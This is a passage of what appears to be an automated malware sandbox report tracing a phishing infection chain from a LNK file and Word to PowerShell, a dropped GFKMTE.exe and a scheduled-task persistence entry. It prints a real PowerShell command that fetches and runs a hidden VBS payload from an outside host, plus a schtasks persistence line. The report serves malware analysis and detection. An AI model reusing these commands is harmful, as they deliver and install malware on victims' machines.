                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: uxtheme.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: wldp.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: amsi.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: userenv.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: profapi.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: msasn1.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: gpapi.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: cryptsp.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: rsaenh.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: cryptbase.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: mscoree.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: version.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: ntmarta.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: uxtheme.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: windows.storage.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: wldp.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: propsys.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: profapi.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: edputil.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: urlmon.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: iertutil.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: srvcli.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: netutils.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: windows.staterepositoryps.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: sspicli.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: wintypes.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: appresolver.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: bcp47langs.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: slc.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: userenv.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: sppc.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: onecorecommonproxystub.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: onecoreuapcommonproxystub.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: apphelp.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: mscoree.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: version.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: windows.storage.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: wldp.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: profapi.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: cryptsp.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: rsaenh.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: cryptbase.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: mswsock.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: dnsapi.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: iphlpapi.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: rasadhlp.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: fwpuclnt.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: mscoree.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: version.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeSection loaded: mscoree.dll
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeSection loaded: apphelp.dll
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeSection loaded: version.dll
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeSection loaded: uxtheme.dll
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeSection loaded: wldp.dll
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeSection loaded: amsi.dll
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeSection loaded: userenv.dll
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeSection loaded: profapi.dll
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeSection loaded: msasn1.dll
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeSection loaded: gpapi.dll
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeSection loaded: cryptsp.dll
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeSection loaded: rsaenh.dll
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeSection loaded: cryptbase.dll
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeSection loaded: mscoree.dll
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeSection loaded: version.dll
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeSection loaded: mscoree.dll
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeSection loaded: version.dll
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeSection loaded: mscoree.dll
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeSection loaded: version.dll
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: mscoree.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: version.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: uxtheme.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: wldp.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: amsi.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: userenv.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: profapi.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: msasn1.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: gpapi.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: cryptsp.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: rsaenh.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: cryptbase.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: mscoree.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: version.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: mscoree.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: version.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
                        Source: TRANSFERENCIA COMPROBANTES.lnk | LNK file: ..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        Source: Window Recorder | Window detected: More than 3 window changes detected
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE | File opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dll
                        Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.1442529638.000001BD45949000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: *n.pdbzj4 source: powershell.exe, 00000001.00000002.1436897425.000001BD455E2000.00000004.00000020.00020000.00000000.sdmp

                        Data Obfuscation

                        Source: 21.2.GFKMTE.exe.293a5ec.2.raw.unpack, DllHandler.cs | .Net Code: DllNodeHandler System.Reflection.Assembly.Load(byte[])
                        Source: 21.2.GFKMTE.exe.293a5ec.2.raw.unpack, DllHandler.cs | .Net Code: DllNodeHandler
                        Source: 21.2.GFKMTE.exe.26a0000.0.raw.unpack, -Module-.cs | .Net Code: _202C_200E_202D_200D_200B_202E_206A_206A_200F_202C_206F_206C_202D_202A_206F_200D_200F_206E_202D_206E_202C_206C_200F_202A_206F_202D_200B_200E_202E_202C_202E_200E_206E_206F_202C_206B_202D_200C_202D_200F_202E System.Reflection.Assembly.Load(byte[])
                        Source: 25.2.GFKMTE.exe.29ba2dc.0.raw.unpack, DllHandler.cs | .Net Code: DllNodeHandler System.Reflection.Assembly.Load(byte[])
                        Source: 25.2.GFKMTE.exe.29ba2dc.0.raw.unpack, DllHandler.cs | .Net Code: DllNodeHandler
                        Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass zhdfboopntjfmdjtgfdjqbinrdfgfdho -WindowStyle -Command hiddeN consent.exe;(new-object System.Net.WebClient).DownloadFile('https://www.stipamana.com/vbsznjgzfzgolnzdgh/tydthcgfhjdfhsfghxffsjhx/vbfdhydjyfjfxhgjhxgh/pafdfgzdf.vbs','pafdfgz.vbs');./'pafdfgz.vbs';(get-item 'pafdfgz.vbs').Attributes += 'Hidden';
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_00007FFAACB48161 push ebx; ret 1_2_00007FFAACB4816A
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_00007FFAACC10D6C push eax; ret 1_2_00007FFAACC10D6D
                        Source: cfdhxdzhtfxgh[1].exe.11.dr | Static PE information: section name: .text entropy: 7.798035539555323
                        Source: GFKMTE.exe.11.dr | Static PE information: section name: .text entropy: 7.798035539555323
                        Source: GFKMTE.exe.22.dr | Static PE information: section name: .text entropy: 7.798035539555323

                        Persistence and Installation Behavior

                        Source: LNK file | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass zhdfboopntjfmdjtgfdjqbinrdfgfdho -WindowStyle -Command hiddeN consent.exe;(new-object System.Net.WebClient).DownloadFile('https://www.stipamana.com/vbsznjgzfzgolnzdgh/tydthcgfhjdfhsfghxffsjhx/vbfdhydjyfjfxhgjhxgh/pafdfgzdf.vbs','pafdfgz.vbs');./'pafdfgz.vbs';(get-item 'pafdfgz.vbs').Attributes += 'Hidden';
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe | File created: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exe
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\cfdhxdzhtfxgh[1].exe

                        Boot Survival

                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /Create /TN "mrec" /XML "C:\Users\user\AppData\Local\Temp\tmp80A6.tmp" /F

                        Hooking and other Techniques for Hiding and Protection

                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe Process information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exe Process information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe Process information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeMemory allocated: E90000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeMemory allocated: 2930000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeMemory allocated: 26A0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeMemory allocated: 4F50000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeMemory allocated: 5F50000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeMemory allocated: 6080000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeMemory allocated: 7080000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeMemory allocated: 73D0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeMemory allocated: 83D0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeMemory allocated: 4F50000 memory reserve | memory write watch
